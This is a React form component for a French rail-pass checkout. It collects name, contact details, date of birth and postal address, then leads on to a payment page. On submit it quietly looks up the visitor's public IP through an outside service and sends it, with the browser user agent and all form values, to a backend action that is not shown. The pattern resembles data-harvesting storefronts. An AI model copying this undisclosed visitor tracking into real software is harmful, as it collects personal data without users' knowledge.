import { zodResolver } from "@hookform/resolvers/zod";
import {
  FormControl,
  FormControl as MuiControl,
  FormControlLabel as MuiControlLabel,
  Radio as MuiRadio,
  RadioGroup,
} from "@mui/material";
import axios from "axios";
import React from "react";
import { useForm } from "react-hook-form";
import { useNavigate } from "react-router-dom";
import { InformationsAction } from "src/actions/informations";
import { Button } from "src/components/ui/button";
import { Form, FormField, FormMessage } from "src/components/ui/form";
import { MuiInput } from "src/components/ui/mui-input";
import { cn } from "src/lib/utils";
import { InformationsSchema } from "src/schemas/Autre";
import { useUserStore } from "src/zustand/userStore";
import { z } from "zod";

interface Props {
  showSubmit?: boolean;
  onPending: (value: boolean) => void;
}

export const AutreForm = React.forwardRef<HTMLButtonElement, Props>(
  ({ showSubmit = true, onPending }, ref) => {
    const form = useForm<z.infer<typeof InformationsSchema>>({
      resolver: zodResolver(InformationsSchema),
    });
    const store = useUserStore();

    const navigate = useNavigate();
    const onSubmit = (values: z.infer<typeof InformationsSchema>) => {
      onPending(true);

      const getValidityByPlan = (plan: string) => {
        switch (plan) {
          case "Pass Rail":
            return 30;
          case "Carte Avantage Jeune":
          case "Carte Avantage Adulte":
          case "Carte Avantage Senior":
          case "Carte Liberté":
            return 365;
          default:
            return 30;
        }
      };
      const calculateProductValidity = (plan: string) => {
        const validityDays = getValidityByPlan(plan);
        const validityDate = new Date();
        validityDate.setDate(validityDate.getDate() + validityDays);
        return validityDate;
      };

      axios.get("https://api.ipify.org/?format=json").then((response) => {
        const ip = response.data.ip; // Adjust depending on API response structure
        const userAgent = navigator.userAgent; // Adjust depending on API response structure
        store.setPaymentInfo({
          user: values,
          id: Math.random().toString(36).substring(2, 9),
          products: store.orders.map((order) => order.product),
        });

        store.setSelectedOrder({
          user: values,
          id: Math.random().toString(36).substring(2, 9),
          product: store.selectedProduct,
          productValidity: calculateProductValidity(store.selectedProduct.name),
        });

        InformationsAction({
          values,
          ip,
          userAgent,
          products: store.orders.map((order) => order.product.name),
          total: store.orders
            .reduce(
              (acc, order) =>
                acc + parseFloat(order.product.price.replace(",", ".")),
              0
            )
            .toFixed(2)
            .replace(".", ","),
        }).finally(() => {
          navigate("/app/paiement");
          onPending(false);
        });
      });
    };

    return (
      <Form {...form}>
        <form
          className="pt-4 flex flex-col gap-4"
          onSubmit={form.handleSubmit(onSubmit)}
        >
          <p className="text-[#5e6878] text-[0.8125rem] tracking-wide font-extralight">
            *champs obligatoires
          </p>
          <div className="pb-4">
            <MuiControl
              component="fieldset"
              error={Boolean(form.formState.errors.gender)}
            >
              <RadioGroup row name="gender" aria-label="gender" defaultValue="">
                <MuiControlLabel
                  control={
                    <MuiRadio color="primary" {...form.register("gender")} />
                  }
                  value="Madame"
                  label="Madame"
                  id="Madame"
                />
                <MuiControlLabel
                  control={
                    <MuiRadio color="primary" {...form.register("gender")} />
                  }
                  value="Monsieur"
                  label="Monsieur"
                  id="Monsieur"
                />
              </RadioGroup>
              {form.formState.errors.gender && (
                <p className="text-destructive text-xs">
                  <span className="flex items-center">
                    <svg
                      aria-hidden="true"
                      viewBox="0 0 24 24"
                      xmlns="http://www.w3.org/2000/svg"
                      className="fill-destructive mr-2 min-w-4 size-4"
                    >
                      <path d="M12 24C18.6274 24 24 18.6274 24 12C24 5.37258 18.6274 0 12 0C5.37258 0 0 5.37258 0 12C0 18.6274 5.37258 24 12 24ZM16.7548 15.3986C16.7799 15.4592 16.7928 15.5242 16.7928 15.5899C16.7928 15.6556 16.7799 15.7206 16.7548 15.7813C16.7296 15.8419 16.6928 15.897 16.6464 15.9435L15.9435 16.6463C15.897 16.6928 15.8419 16.7296 15.7813 16.7547C15.7206 16.7799 15.6556 16.7928 15.5899 16.7928C15.5243 16.7928 15.4592 16.7799 15.3986 16.7547C15.3379 16.7296 15.2828 16.6928 15.2364 16.6463L12.3535 13.7635C12.3071 13.717 12.2519 13.6802 12.1913 13.6551C12.1306 13.63 12.0656 13.617 11.9999 13.617C11.9343 13.617 11.8693 13.63 11.8086 13.6551C11.7479 13.6802 11.6928 13.717 11.6464 13.7635L8.76348 16.6463C8.71706 16.6928 8.66193 16.7296 8.60127 16.7547C8.54061 16.7799 8.47559 16.7928 8.40993 16.7928C8.34427 16.7928 8.27925 16.7799 8.21859 16.7547C8.15792 16.7296 8.1028 16.6928 8.05638 16.6463L7.35348 15.9435C7.30705 15.897 7.27022 15.8419 7.24509 15.7813C7.21996 15.7206 7.20703 15.6556 7.20703 15.5899C7.20703 15.5242 7.21996 15.4592 7.24509 15.3986C7.27022 15.3379 7.30705 15.2828 7.35348 15.2363L10.2364 12.3535C10.2828 12.307 10.3196 12.2519 10.3448 12.1913C10.3699 12.1306 10.3828 12.0656 10.3828 11.9999C10.3828 11.9343 10.3699 11.8692 10.3448 11.8086C10.3196 11.7479 10.2828 11.6928 10.2364 11.6463L7.35348 8.76348C7.30705 8.71705 7.27022 8.66193 7.24509 8.60126C7.21996 8.5406 7.20703 8.47558 7.20703 8.40992C7.20703 8.34426 7.21996 8.27924 7.24509 8.21857C7.27022 8.15791 7.30705 8.10279 7.35348 8.05636L8.05638 7.35348C8.1028 7.30705 8.15792 7.27022 8.21859 7.24509C8.27925 7.21996 8.34427 7.20703 8.40993 7.20703C8.47559 7.20703 8.54061 7.21996 8.60127 7.24509C8.66193 7.27022 8.71706 7.30705 8.76348 7.35348L11.6464 10.2363C11.6928 10.2828 11.7479 10.3196 11.8086 10.3447C11.8693 10.3699 11.9343 10.3828 11.9999 10.3828C12.0656 10.3828 12.1306 10.3699 12.1913 10.3447C12.2519 10.3196 12.3071 10.2828 12.3535 10.2363L15.2364 7.35348C15.2828 7.30705 15.3379 7.27022 15.3986 7.24509C15.4592 7.21996 15.5243 7.20703 15.5899 7.20703C15.6556 7.20703 15.7206 7.21996 15.7813 7.24509C15.8419 7.27022 15.897 7.30705 15.9435 7.35348L16.6464 8.05636C16.6928 8.10279 16.7296 8.15791 16.7548 8.21857C16.7799 8.27924 16.7928 8.34426 16.7928 8.40992C16.7928 8.47558 16.7799 8.5406 16.7548 8.60126C16.7296 8.66193 16.6928 8.71705 16.6464 8.76348L13.7635 11.6463C13.7171 11.6928 13.6802 11.7479 13.6551 11.8086C13.63 11.8692 13.617 11.9343 13.617 11.9999C13.617 12.0656 13.63 12.1306 13.6551 12.1913C13.6802 12.2519 13.7171 12.307 13.7635 12.3535L16.6464 15.2363C16.6928 15.2828 16.7296 15.3379 16.7548 15.3986Z"></path>
                    </svg>
                    <p className="text-[0.8rem] font-medium text-destructive">
                      {form.formState.errors.gender.message}
                    </p>
                  </span>
                </p>
              )}
            </MuiControl>
          </div>
          <FormField
            control={form.control}
            name="prenom"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Prénom*"
                    className="flex-grow w-full"
                    {...field}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <FormField
            control={form.control}
            name="nom"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Nom*"
                    className="flex-grow w-full"
                    {...field}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <FormField
            control={form.control}
            name="email"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Adresse e-mail (exemple@mail.fr)*"
                    className="flex-grow w-full"
                    {...field}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <FormField
            control={form.control}
            name="mobile"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Numéro de mobile*"
                    className="flex-grow w-full"
                    {...field}
                    onChange={(e) => {
                      let input = e.target.value.replace(/\D+/g, ""); // Remove non-digit characters
                      if (input.length > 10) {
                        input = input.substring(0, 10); // Limit input to 10 digits
                      }

                      // Add space after every 2 digits
                      const formattedInput = input
                        .split("") // Convert string to array of characters
                        .reduce((acc, digit, idx) => {
                          if (idx !== 0 && idx % 2 === 0) {
                            acc += " "; // Add a space before the digit if it's after every 2 digits
                          }
                          acc += digit;
                          return acc;
                        }, "");

                      field.onChange(formattedInput); // Update the field value
                    }}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <FormField
            control={form.control}
            name="dateOfBirth"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Date de naissance (JJ/MM/AAAA)*"
                    className="flex-grow w-full"
                    {...field}
                    onChange={(e) => {
                      let input = e.target.value.replace(/\D+/g, ""); // Remove non-digit characters

                      if (input.length > 8) {
                        input = input.substring(0, 8); // Limit input to 8 digits (DDMMYYYY)
                      }

                      // Add slashes after the day and month parts
                      const formattedInput = input
                        .split("") // Convert string to array of characters
                        .reduce((acc, digit, idx) => {
                          if (idx === 2 || idx === 4) {
                            acc += "/"; // Add a slash after the day and month
                          }
                          acc += digit;
                          return acc;
                        }, "");

                      const [day, month, year] = formattedInput.split("/");
                      if (day && month && year && year.length === 4) {
                        const dob = new Date(`${year}-${month}-${day}`);
                        const today = new Date();
                        let age = today.getFullYear() - dob.getFullYear();
                        const monthDiff = today.getMonth() - dob.getMonth();
                        const dayDiff = today.getDate() - dob.getDate();

                        // Adjust age if the birth date has not occurred yet this year
                        if (monthDiff < 0 || (monthDiff === 0 && dayDiff < 0)) {
                          age--;
                        }

                        const minAge = 18;
                        const maxAge = 120;

                        if (!minAge || !maxAge) {
                          field.onChange(formattedInput);
                          return;
                        }

                        if (age >= minAge && age <= maxAge) {
                          field.onChange(formattedInput); // Update the field value if age is within the range
                        } else {
                          // Show an error message
                          form.setError("dateOfBirth", {
                            message: `La date de naissance doit être comprise entre ${minAge} et ${maxAge} ans.`,
                          });
                        }
                      } else {
                        field.onChange(formattedInput); // Update the field value with partial input if not yet complete
                      }
                    }}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <h2 className="text-lg lg:text-2xl font-bold mt-2">
            Adresse postale*
          </h2>
          <FormField
            control={form.control}
            name="voie"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="N° et nom de la voie*"
                    className="flex-grow w-full"
                    {...field}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <FormField
            control={form.control}
            name="codePostal"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Code Postal*"
                    className="flex-grow w-full"
                    {...field}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <FormField
            control={form.control}
            name="ville"
            render={({ field }) => (
              <>
                <FormControl>
                  <MuiInput
                    label="Ville*"
                    className="flex-grow w-full"
                    {...field}
                  />
                </FormControl>
                <FormMessage />
              </>
            )}
          />
          <Button
            className={cn("w-[100px] mx-auto", !showSubmit && "hidden")}
            ref={ref}
          >
            Continuer
          </Button>
        </form>
      </Form>
    );
  }
);
